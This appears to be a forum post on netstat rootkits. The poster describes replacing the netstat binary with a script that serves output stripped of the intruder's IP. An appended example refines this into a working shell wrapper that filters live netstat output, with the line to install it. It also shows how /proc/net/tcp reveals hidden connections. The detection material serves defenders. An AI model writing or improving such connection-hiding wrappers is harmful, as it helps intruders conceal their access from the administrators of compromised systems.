I'm coding a simple C program to include in a "tool package" where I have some programs that are indispensable in pen tests, but I've got one question. It's about netstat, and how the netstat rootkits work: how they hide connections between the kiddie and the server, and all the important stuff about netstat rootkits. Any paper about that?
So I have made my own. It works like this: first it asks for the cracker's IP address and puts it into a variable; next, it executes netstat and puts the result into a text file, but without the cracker's IP address, like this (netstat | grep -v 192.xxx.xxx.x) to a file called netstat.tmp. OK, we have a text file without our address. Now it renames the true netstat to another name, like netstat.old, and creates a shell script with the name of the original netstat.
When someone executes netstat, the shell script will be loaded and cats (cat netstat.tmp) to the screen. It's an easy way that I found to do that. Any other ideas?!
greetz
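The filtering idea from the post, as an added example that is not the poster's code: instead of caching one netstat run into netstat.tmp and cat-ing the stale file, the wrapper below filters whatever netstat prints on each call, and it matches the whole Foreign Address column rather than a bare substring, so hiding 192.168.1.5 does not also swallow 192.168.1.50. The netstat output is constructed sample data, not a real capture; the function names and the addresses are assumptions for illustration. The second helper shows the check a defender uses against this class of userland trick: netstat is just a reader of /proc/net/tcp, and a connection hidden in the binary's output is still visible there, with the peer address printed as a little-endian hex word on x86 hosts.

```shell
#!/bin/sh
# Added example (not the original poster's code): filter netstat output per call
# instead of serving a cached file, plus the /proc/net/tcp check that exposes it.

# Constructed sample of `netstat -tn` output (not a real capture).
SAMPLE_NETSTAT='Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.0.0.7:22             192.168.1.5:51234       ESTABLISHED
tcp        0      0 10.0.0.7:22             192.168.1.50:40000      ESTABLISHED
tcp        0      0 10.0.0.7:443            203.0.113.9:33322       ESTABLISHED'

# hide_peer ADDRESS: drop every stdin line whose Foreign Address column ($5)
# is exactly ADDRESS. Requiring the ':' after the address means 192.168.1.5
# does not also hide 192.168.1.50, unlike a plain `grep -v 192.168.1.5`.
# Header lines have no matching $5 and pass through unchanged.
hide_peer() {
    awk -v ip="$1" 'index($5, ip ":") != 1'
}

# ip_to_proc_hex ADDRESS: the same IPv4 address as /proc/net/tcp prints it in
# the rem_address column on a little-endian host such as x86 (bytes reversed).
# 192.168.1.5 -> 0501A8C0
ip_to_proc_hex() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    printf '%02X%02X%02X%02X' "$4" "$3" "$2" "$1"
}

# count_peer ADDRESS: lines of the filtered sample that still mention ADDRESS
# (grep -c exits 1 on a zero count, hence the `|| true`).
count_peer() {
    printf '%s\n' "$SAMPLE_NETSTAT" | hide_peer "$1" | grep -c "$1:" || true
}

# Demo: what a user of the wrapped netstat sees, and where the kernel still tells.
printf '%s\n' "$SAMPLE_NETSTAT" | hide_peer 192.168.1.5
echo "grep /proc/net/tcp for rem_address $(ip_to_proc_hex 192.168.1.5) to find it anyway"
```

Installed as the wrapper script, the filter would be `"$0.old" "$@" | hide_peer "$HIDDEN_IP"`, i.e. the renamed real binary piped through the filter. Anything that reads /proc/net/tcp directly (ss, lsof, a one-line Python script, or `grep 0501A8C0 /proc/net/tcp`) sees the connection regardless, which is why real rootkits that hide connections have to intercept at the libc or kernel level rather than wrap the netstat binary.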




